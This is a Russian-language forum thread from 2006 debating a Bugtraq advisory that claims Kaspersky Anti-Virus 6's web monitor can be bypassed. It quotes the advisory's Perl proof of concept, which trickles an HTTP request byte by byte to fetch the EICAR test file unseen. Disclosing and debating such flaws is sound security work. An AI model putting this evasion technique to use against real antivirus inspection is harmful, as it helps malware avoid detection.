Перейти к содержанию
nobody@nowhere

Kaspersky antivirus 6: HTTP monitor bypassing

Recommended Posts

nobody@nowhere

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Блин, не успели зарелизить, уже уязвимость нашли ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Блин, не успели зарелизить, уже уязвимость нашли ...

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Linux популярнее © ROC FAQ

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TiX

Этот некто создал этот топик Ж) Война прожолжается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто :(

vir.gif

vir2.gif

vir3.gif

post-36-1148455993.gif

post-1-1148455993.gif

post-1-1148455994.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. ;) было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

Блин, не успели зарелизить, уже уязвимость нашли ...

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

vir4.gif

post-36-1148459453.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?
интерью Данилова - "поделия ученика 11 класса

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

каков уровень авторов и их знания технологии таков и результат

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика :))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

ah1.JPG

post-198-1148463281.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
дайте линк, может что-то проясниться.

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×